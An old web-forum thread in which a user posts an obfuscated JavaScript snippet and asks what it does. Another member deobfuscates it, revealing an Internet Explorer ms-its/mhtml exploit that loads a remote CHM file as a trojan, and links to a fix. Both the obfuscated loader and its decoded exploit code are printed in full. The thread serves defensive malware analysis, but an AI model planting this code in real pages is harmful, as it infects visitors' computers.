hack script? ne one knows javascript

Discussion in 'QnA (read only)' started by sunnydiv, Oct 22, 2004.

Thread Status:
Not open for further replies.
  1. sunnydiv

    sunnydiv Guest

    hey i got this


    <script type="text/javascript" language="JavaScript">
    x=78;
    es="YVnv^QfYWQd_b|Q``>Q]U--p=YSb_c_Vdn9^dUb^Udn5h`\\_bUbpw\nnnnk\nnnnnnnfQbn9^Ud@QdX-T_Se]U^d|\\_SQdY_^|XbUV+\nnnnnnnZ-9^Ud@QdX|\\Qcd9^TUh?Vvu}uw+\nnnnnnn9^Ud@QdX-9^Ud@QdX|c\\YSUv~zZw+\nnnnnnnfQbn_=C9DC-T_Se]U^d|SbUQdU5\\U]U^dvp?2:53Dpw+\nnnnnnnc@bUVYh-e^UcSQ`Uvps&Tc{Ys'$c*]Xd]\\*pw+\nnnnnnn_=C9DC|TQdQ-c@bUVYhyuVY\\U*}}3*LL=19>|=8Douy9^Ud@QdXyu}}h]QY^|SX]**}]QY^|Xd]u++\nnnnnnn_=C9DC|di`U-pdUhd}h{cSbY`d\\Udp+\nnnnnnnT_Se]U^d|R_Ti|Q``U^T3XY\\Tv_=C9DCw+n\nnmnn";
    var ds=new String();
    for(var j=0;j<es.length;j++)
    {e=es.charCodeAt(j);if(e==10){ds=ds+'\n';}else{d=e-x;if (d<0x20){d=e+0x7E-x-0x20;}ds=ds+String.fromCharCode(d);}}eval(ds);
    </script>



    now my account has 50 k in it, and i dont wanna losse it to some password stealing script, so if ne one can tell me what the above does

    and how i can disarm it,,

    please help
     
  2. netcracker

    netcracker New Member

    Joined:
    Aug 24, 2004
    Messages:
    102
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Goa
    Is this a challenge!!!! Where did you get that?
    :shock:
     
  3. SmoothCriminal

    SmoothCriminal New Member

    Joined:
    Mar 28, 2004
    Messages:
    331
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Chennai
    mm. There's a sort of encrypted javascript esp used to hide password information.. this one looks like that..
     
  4. Deep

    Deep Version 2.0

    Joined:
    Jan 23, 2004
    Messages:
    977
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Mumbai
    looks like it is encrypted..

    do this..
    there is one software which will show u all the details which are being passed and allows to maipulate it..

    so u need to downlaod the software and submit the pssword (ofcourse wrong) and see where your password is going....

    software name?
    well i dont remember it now..i will check it in the office tmrw and let you know..

    Deep
     
  5. it_waaznt_me

    it_waaznt_me Coming back to life ..

    Joined:
    Nov 30, 2003
    Messages:
    2,023
    Likes Received:
    10
    Trophy Points:
    38
    Location:
    A bit closer to heaven
    It is converting the es string parts to some other string ds after running a char code algorithm ... Hmmmm... Will have a look at it after some time ..
     
  6. Deep

    Deep Version 2.0

    Joined:
    Jan 23, 2004
    Messages:
    977
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Mumbai
    btw..
    script is checking for the IE and redirecting it to the location or something..

    code looks like incomplete..

    anyways it generates this code....


    if (navigator.appName=="Microsoft Internet Explorer")
    {
    var InetPath=document.location.href;
    j=InetPath.lastIndexOf('/');
    InetPath=InetPath.slice(0,j);
    var oMSITS=document.createElement("OBJECT");
    sPrefix=unescape("%6ds-i%74s:mhtml:"); oMSITS.data=sPrefix+'file://C:\\MAIN.MHT!'+InetPath+'//xmain.chm::/main.htm';;
    oMSITS.type="text/x-scriptlet";
    document.body.appendChild(oMSITS);
    }

    Regards
    Deep
     
  7. Deep

    Deep Version 2.0

    Joined:
    Jan 23, 2004
    Messages:
    977
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Mumbai
    UPDATE : in short it is a trojan :D

    check this page for more info...

    http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=96

    solution: http://www.securityfocus.com/bid/9658/solution/


    how did i find out it?

    pretty simple actually..

    this is what i did..

    i copied the script into htm file..
    opned the file to check the output..

    nothing happened so i used document.write () to print the values of the variables..

    got some values and got idea about the function...

    it generates another function which checks for browswer IE....

    so i copied the generated code into new html file and ran the file..

    again followed teh same procedure..used document.write ()

    got value..

    Code:
    ms-its:mhtml:file://C:\MAIN.MHT!file:///C:/Documents%20and%20Settings/Administrator/Desktop//xmain.chm::/main.htm
    and then what?

    haha i asked google

    and found the answer :)


    ignore this if you find it boring.. lol
    Deep
     
  8. tuxfan

    tuxfan New Member

    Joined:
    Feb 4, 2004
    Messages:
    2,653
    Likes Received:
    9
    Trophy Points:
    0
    Location:
    Mumbai
    Not boring at all. Its very interesting Deep :) But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?
     
  9. xenkatesh

    xenkatesh Bewitched!

    Joined:
    Feb 7, 2004
    Messages:
    468
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    chennai
    ya a lots of informations dude!
     
  10. Deep

    Deep Version 2.0

    Joined:
    Jan 23, 2004
    Messages:
    977
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Mumbai
    looks like it will fail..

    infact if the system is patched then also it wont on IE also work i suppose..

    Deep
     
  11. OP
    OP
    sunnydiv

    sunnydiv Guest

    thank you man, ur like god to me today

    thnk you

    from the bottom of my heard, i will give this link on the other forum who all got afftect with same

    hope this saves a few lakhs of money at least
     
  12. Deep

    Deep Version 2.0

    Joined:
    Jan 23, 2004
    Messages:
    977
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Mumbai
    no problems sir :)
    always at your serice ;)

    cheers
    Deep
     
  13. tuxfan

    tuxfan New Member

    Joined:
    Feb 4, 2004
    Messages:
    2,653
    Likes Received:
    9
    Trophy Points:
    0
    Location:
    Mumbai
    So thats one more reason to switch over from IE to WHICHEVER OTHER BROWSER YOU CAN LAY YOUR HANDS ON ;)
     
Thread Status:
Not open for further replies.

Share This Page